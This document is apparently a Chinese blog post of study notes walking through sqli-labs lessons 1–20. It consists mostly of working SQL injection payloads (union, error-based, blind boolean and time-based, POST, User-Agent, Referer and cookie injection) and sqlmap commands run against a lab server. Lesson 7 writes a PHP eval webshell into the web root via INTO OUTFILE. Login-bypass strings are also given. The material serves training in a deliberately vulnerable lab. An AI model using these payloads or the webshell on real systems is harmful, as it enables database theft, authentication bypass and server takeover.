sqli_labs學習筆記(一)Less-1~Less-20
開門見山php
Less-1 GET - Error based - Single quotes - String(基於錯誤的GET單引號字符型注入)
· 方法一:手工UNION聯合查詢注入
輸入單引號,頁面報錯,html
注意 id=非正確值mysql
爆庫payloadlinux
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,3 --+nginx
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,database() --+sql
獲得‘security’庫名數據庫
爆表payloadapache
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+服務器
或cookie
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
查到 emails,referers,uagents,users ,顯然users是用戶數據表
爆列名(字段)payload
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
爆值payload
http://43.247.91.228:84/Less-1?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
0x3a: 0x是十六進制標誌,3a是十進制的58,是ascii中的 ':' ,用以分割pasword和username。
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
· 方法二:手工報錯型注入
檢測報錯型payload
?id=1' and 1=1--+ //正確
?id=1' and 1=2--+ //失敗
注意id=正確值
爆表payload
http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
爆列名(字段)payload
http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
爆值payload
http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+
顯然沒有徹底顯示
http://43.247.91.228:84/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+
· 方法三:sqlmap工具自動注入
Sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1"
sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security --tables
sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security -T users --columns
sqlmap.py -u "http://43.247.91.228:84/Less-1?id=1" -D security -T users -C username,password --dump
Less-2 GET - Error based - Intiger based (基於錯誤的GET整型注入)
· 方法一:手工UNION聯合查詢注入
判斷報錯,
http://43.247.91.228:84/Less-2/?id=1 and 1=1
http://43.247.91.228:84/Less-2/?id=1 and 1=2
暴出位置
http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,3
暴出表
http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
暴出字段
http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
暴出記錄
http://43.247.91.228:84/Less-2/?id=1 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users
· 方法二:手工報錯型注入
暴出表
http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))
暴出字段
http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))
暴出記錄
http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))
顯示未徹底
http://43.247.91.228:84/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina'))))
· 方法三:sqlmap
sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security --tables
sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security -T users --column
sqlmap.py -u "http://43.247.91.228:84/Less-2/?id=1" -D security -T users -C username,password --dump
Less-3 GET - Error based - Single quotes with twist string (基於錯誤的GET單引號變形字符型注入)
· 方法一:手工UNION聯合查詢注入
單引號+)報錯
http://43.247.91.228:84/Less-3/?id=1') and 1=1 --+
http://43.247.91.228:84/Less-3/?id=1') and 1=2 --+
暴出位置
Id非正確值
http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,3 --+
暴出表
http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
暴出字段
http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
暴出記錄
http://43.247.91.228:84/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+
· 方法二:手工報錯型注入
暴出表
Id爲正確值
http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
暴出字段
http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
暴出記錄
http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+
未顯示徹底
http://43.247.91.228:84/Less-3/?id=1') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+
· 方法三:sqlmap工具自動注入
sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1"
sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security --table
sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security -T users --column
sqlmap.py -u "http://43.247.91.228:84/Less-3/?id=1" -D security -T users -C username,password --dump
Less-4 GET - Error based - Double Quotes - String (基於錯誤的GET雙引號字符型注入)
· 方法一:手工UNION聯合查詢注入
判斷報錯
http://43.247.91.228:84/Less-4/?id=1") and 1=1 --+
http://43.247.91.228:84/Less-4/?id=1") and 1=2 --+
暴出位置
Id值爲不正確值
http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,3 --+
暴出表
http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
暴出字段
http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
暴出記錄
http://43.247.91.228:84/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+
· 方法二:手工報錯型注入
暴出表
Id爲正確值
http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
暴出字段
http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
暴出記錄
http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+
未顯示徹底
http://43.247.91.228:84/Less-4/?id=1") and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+
· 方法三:sqlmap工具自動注入
sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1"
sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security --table
sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security -T users --column
sqlmap.py -u "http://43.247.91.228:84/Less-4/?id=1" -D security -T users -C username,password --dump
Less-5 GET - Double Injection - Single Quotes - String (雙注入GET單引號字符型注入)
· 方法一:時間延遲型手工注入
時間延遲型手工注入,正確會延遲,錯誤沒有延遲。
驗證時間延遲型的盲注:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+
發現明顯延遲,
爆庫長payload
http://43.247.91.228:84/Less-5/?id=1' and if(length(database())=8,sleep(5),1) --+
爆庫名payload
http://43.247.91.228:84/Less-5/?id=1' and if(left(database(),1)='s',sleep(5),1) --+
爆表名payload
http://43.247.91.228:84/Less-5/?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+
爆列名payload
http://43.247.91.228:84/Less-5/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+
暴數據payload
http://43.247.91.228:84/Less-5/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
http://43.247.91.228:84/Less-5/?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
須要注意的是,mysql對大小寫不敏感,因此你不知道是Dumb 仍是dumb。
· 方法二,布爾型手工注入
在布爾型注入中,正確會回顯,錯誤沒有回顯,以此爲依據逐字爆破,
暴庫payload
http://43.247.91.228:84/Less-5/?id=1' and left((select database()),1)='s' --+
爆表paylaod
http://43.247.91.228:84/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
爆列名payload
http://43.247.91.228:84/Less-5/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+
爆字段payload
http://43.247.91.228:84/Less-5/?id=1' and left((select username from users limit 0,1),1)='d' --+
須要注意的是,mysql對大小寫不敏感,因此你不知道是Dumb 仍是dumb。
· 方法三,sqlmap工具注入
sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1"
sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security --table
sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security -T users --column
sqlmap.py -u "http://43.247.91.228:84/Less-5/?id=1" -D security -T users -C username,password --dump
Less-6 GET - Double Injection - Double Quotes - String (雙注入GET雙引號字符型注入)
· 方法一:時間延遲型手工注入
判斷報錯
http://43.247.91.228:84/Less-6/?id=1" and sleep(5) --+
一個字符一個字符的猜解
暴出庫名
http://43.247.91.228:84/Less-6/?id=1" and if(left(database(),1)='s',sleep(5),1) --+
暴出表名
http://43.247.91.228:84/Less-6/?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1) --+
暴出字段
http://43.247.91.228:84/Less-6/?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(5),1) --+
暴出記錄
http://43.247.91.228:84/Less-6/?id=1" and if(left((select username from users limit 0,1),1)='d',sleep(5),1) --+
· 方法二,布爾型手工注入
正確會回顯,錯誤沒有回顯
暴出庫名
http://43.247.91.228:84/Less-6/?id=1" and left((select database()),1)='s' --+
暴出表名
http://43.247.91.228:84/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
暴出字段
http://43.247.91.228:84/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+
暴出記錄
http://43.247.91.228:84/Less-6/?id=1" and left((select username from users limit 0,1),1)='d' --+
方法三,sqlmap工具注入
sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1"
sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" --dbs
sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security --table
sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users --column
sqlmap.py -u "http://43.247.91.228:84/Less-6/?id=1" -D security -T users -C username,password --dump
Less-7 GET - Dump into outfile - String (導出文件GET字符型注入)
小擴展:
winserver的iis默認路徑c:\Inetpub\wwwroot
linux的nginx通常是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就.../var/www/htm,.../var/www/html/htdocs
phpstudy 就是...\PhpStudy20180211\PHPTutorial\WWW\
xammp 就是...\xampp\htdocs
load_file()導出文件
Load_file(file_name):讀取文件並返回該文件的內容做爲一個字符串。
使用條件:
A、必須有權限讀取而且文件必須徹底可讀
and (select count(*) from mysql.user)>0/* 若是結果返回正常,說明具備讀寫權限。
and (select count(*) from mysql.user)>0/* 返回錯誤,應該是管理員給數據庫賬戶降權
B、欲讀取文件必須在服務器上
C、必須指定文件完整的路徑
D、欲讀取文件必須小於max_allowed_packet
在less-2直接注入拿到路徑
http://43.247.91.228:84/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+
注入less-7
Payload
?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "F:\\WhiteFlie\\PhpStudy20180211\\PHPTutorial\\WWW\\sqli-labs\\a.php"--+
前面爲網站絕對路徑
雖然回顯報錯,可是查看本地文件已經寫入了一句話木馬
中國菜刀鏈接
須要說一下這個方法須要mysql數據庫開啓secure-file-priv寫文件權限,不然不能寫入文件。
Less-8 GET - Blind - Boolian Based - Single Quotes (布爾型單引號GET盲注)
判斷報錯
http://43.247.91.228:84/Less-8/?id=1' and 1=1 --+
http://43.247.91.228:84/Less-8/?id=1' and 1=2 --+
猜解庫的長度
http://43.247.91.228:84/Less-8/?id=1' and length(database())=8 --+
猜解庫名
http://43.247.91.228:84/Less-8/?id=1' and left((select database()),1)='s' --+
http://43.247.91.228:84/Less-8/?id=1' and left((select database()),8)='security' --+
猜解表名
http://43.247.91.228:84/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' --+
猜解字段名
http://43.247.91.228:84/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+
猜解記錄
http://43.247.91.228:84/Less-8/?id=1' and left((select username from users limit 0,1),1)='d' --+
Less-9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲注)
判斷延時
http://43.247.91.228:84/Less-9/?id=1' and sleep(3) --+
猜解庫的長度
http://43.247.91.228:84/Less-9/?id=1' and if(length(database())=8,sleep(3),1) --+
猜解庫名
http://43.247.91.228:84/Less-9/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+
猜解表名
http://43.247.91.228:84/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+
猜解字段名
http://43.247.91.228:84/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+
猜解記錄
http://43.247.91.228:84/Less-9/?id=1' and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+
Less-10 GET - Blind - Time based - double quotes (基於時間的雙引號盲注)
判斷延時
http://43.247.91.228:84/Less-10/?id=1」 and sleep(3) --+
猜解庫的長度
http://43.247.91.228:84/Less-10/?id=1」 and if(length(database())=8,sleep(3),1) --+
猜解庫名
http://43.247.91.228:84/Less-10/?id=1」 and if(left((select database()),1)='s',sleep(3),1) --+
猜解表名
http://43.247.91.228:84/Less-10/?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+
猜解字段名
http://43.247.91.228:84/Less-10/?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+
猜解記錄
http://43.247.91.228:84/Less-10/?id=1" and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+
Less-11 POST - Error Based - Single quotes- String (基於錯誤的POST型單引號字符型注入)
用Dump用戶使用Dump密碼登錄,能夠看到如下
輸入admin admin 登錄,抓包,發送到repeater模塊
· 方法一 extractvalue測試payload
uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登錄
uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登錄
說明注入生效,存在報錯型注入,接下來又是重複性工做,上extractvalue()
爆庫payload
uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit
爆表payload
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit
爆列名payload
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit
爆值payload
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit
使用not in 能夠查詢其餘值
· 方法二 聯合查詢union select測試payload
爆出位置
注意uname是錯誤的,才能顯示聯合查詢內容。
uname=0' union select 1,2 --+&passwd=admin&submit=Submit
爆庫payload
uname=-1' union select 1,database() --+&passwd=admin&submit=Submit
暴表payload
uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit
暴字段payload
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit
暴記錄payload
uname=-1' union select 1,group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit
Less-12 POST - Error Based - Double quotes- String-with twist (基於錯誤的雙引號POST型字符型變形的注入)
sql查詢語句
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
構造一個能閉合語句並且會報錯的payload:
admin" and extractvalue(1,concat(0x7e,(select database()))) and "
最終admin = "admin" and extractvalue(1,concat(0x7e,(select database()))) and " "
傳入後就變成了:
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
· 方法一 extractvalue測試payload
爆庫payload
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
爆表payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit
爆列payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit
爆值payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit
使用not in查詢沒有顯示出的其餘值
· 方法二 聯合查詢union select測試payload
爆出位置
uname=0") union select 1,2 --+&passwd=admin&submit=Submit
暴庫payload
uname=0") union select 1,database() --+&passwd=admin&submit=Submit
爆表payload
uname=0") union select 1, group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit
暴列payload
uname=0") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit
暴值payload
uname=0") union select 1, group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit
· 方法三,歪門邪道
報錯的內容爲:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin") LIMIT 0,1' at line 1
能夠看出,他在咱們輸入的哪裏多加了一個雙引號和括號。
據此構造出萬能密碼的Payload:
帳號:admin")#
密碼隨意
Less-13 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)
爆表payload
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and (' &passwd=admin&submit=Submit
或者
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ &passwd=admin&submit=Submit
暴列payload
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+ &passwd=admin&submit=Submit
暴值payload
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+ &passwd=admin&submit=Submit
顯示未徹底
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+ &passwd=admin&submit=Submit
· 方法二,時間型盲注
由於能夠報錯注入,這個方法沒有回顯,就有點雞肋了,給個樣例payload:
uname=admin') and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit
Less-14 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)
方法一,報錯型
暴庫payload
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
暴表payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit
暴列payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit
暴值payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and " &passwd=admin&submit=Submit
方法二,時間型盲注
效率低,雞肋
樣例payload
uname=admin" and if(left(database(),1)='s',sleep(3),1) --+ &passwd=admin&submit=Submit
方法三,聚合函數
具備隨機性,雞肋
樣例payload
uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd=admin&submit=Submit
less-15 POST - Blind- Boolian/time Based - Single quotes (基於bool型/時間延遲單引號POST型盲注)
時間延遲測試payload
uname=admin' and sleep(5) --+&passwd=admin&submit=Submit
明顯延遲,肯定使用延遲注入。
手工延遲注入,最爲致命。
暴庫長度payload
uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=admin&submit=Submit
暴庫payload
uname=admin' and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit
爆表payload
uname=admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+&passwd=admin&submit=Submit
暴列payload
uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+&passwd=admin&submit=Submit
暴值payload
uname=admin' and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left((select username from users limit 0,1),4)='Dumb',sleep(3),1) --+&passwd=admin&submit=Submit
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基於bool型/時間延遲的雙引號POST型盲注)
時間延遲驗證
uname=admin") and sleep(3) --+&passwd=admin&submit=Submit
明顯延遲
暴庫長
uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=admin&submit=Submit
暴庫
uname=admin") and if(left((select database()),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit
暴表
uname=admin") and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+&passwd=admin&submit=Submit
暴字段
uname=admin") and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+&passwd=admin&submit=Submit
暴值
uname=admin") and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&passwd=admin&submit=Submit
· 方法二:歪門邪道:
萬能帳號繞過密碼驗證:admin")#
注入結束。
Less-17 POST - Update Query- Error Based - String (基於錯誤的更新查詢POST注入)
這裏對uname作了check_input的處理
作了這麼多花裏胡哨的過濾,卻沒對password也搞一次
針對password爆破:
使用updatexml(),它和extractvaule()是親兄弟,
測試version()返回mysql版本
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+&submit=Submit
爆庫payload
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) --+&submit=Submit
爆表名payload
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&submit=Submit
爆列名payload
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) --+&submit=Submit
爆值payload
使用 :uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+ &submit=Submit
發現不行:加一層select嵌套
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select password from (select password from users where username='admin'))),1) --+ &submit=Submit
須要加個別名
uname=admin&passwd=11' and updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1) --+&submit=Submit
或者
uname=admin&passwd=11' and updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+&submit=Submit
Less-18 POST - Header Injection - Uagent field - Error based (基於錯誤的用戶代理,頭部POST注入)
看到user-agent的回顯,猜想注入點在user-agnet,能夠直接測試
爆庫payload
User-Agent: ' and extractvalue(1,concat(0x7e,database())) and '
暴表payload
User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
暴字段payload
User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
暴值payload
User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '
未顯示徹底
User-Agent: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '
Less-19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST報錯注入)
暴庫payload
Referer: ' and extractvalue(1,concat(0x7e,database())) and '
暴表
Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
暴字段
Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
暴值
Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and '
顯示未徹底
Referer: ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) and '
Less-20 POST - Cookie injections - Uagent field - Error based (基於錯誤的cookie頭部POST注入)
登陸後頁面:
看到cookie:uname=admin 沒毛病就是cookie注入了
抓有cookie的包
加單引號
Cookie: uname=admin'
爆出語法錯誤,看得出來就是單引號型。
暴字段數
Cookie: uname=admin' order by 3 --+ //正常
Cookie: uname=admin' order by 4 --+ //報錯 判斷字段數爲3
爆庫payload
注:uname值爲不正確
Cookie: uname=-admin' union select 1,2,database() --+
暴表
Cookie: uname=-admin' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
暴字段
Cookie: uname=-admin' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
暴值
Cookie: uname=-admin' union select 1,2,group_concat(username,0x3a,password) from users --+
感謝看雪提供的平臺
未完待取...
- 1. sqli_labs lesson11 學習筆記
- 2. sqli_labs學習筆記(一)Less-54~Less-65
- 3. 【學習筆記】Unity3d學習筆記(一)
- 4. sqli_labs writeup
- 5. 學習筆記一
- 6. React學習筆記(一)- 入門筆記
- 7. Python學習筆記————筆記一
- 8. 機器學習學習筆記一
- 9. 《Git學習指南》學習筆記(一)
- 10. 深度學習學習筆記(一)
- 更多相關文章...
- • 您已經學習了 XML Schema,下一步學習什麼呢? - XML Schema 教程
- • 我們已經學習了 SQL,下一步學習什麼呢? - SQL 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • Kotlin學習(一)基本語法
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. python的安裝和Hello,World編寫
- 2. 重磅解讀:K8s Cluster Autoscaler模塊及對應華爲雲插件Deep Dive
- 3. 鴻蒙學習筆記2(永不斷更)
- 4. static關鍵字 和構造代碼塊
- 5. JVM筆記
- 6. 無法啓動 C/C++ 語言服務器。IntelliSense 功能將被禁用。錯誤: Missing binary at c:\Users\MSI-NB\.vscode\extensions\ms-vsc
- 7. 【Hive】Hive返回碼狀態含義
- 8. Java樹形結構遞歸(以時間換空間)和非遞歸(以空間換時間)
- 9. 數據預處理---缺失值
- 10. 都要2021年了,現代C++有什麼值得我們學習的?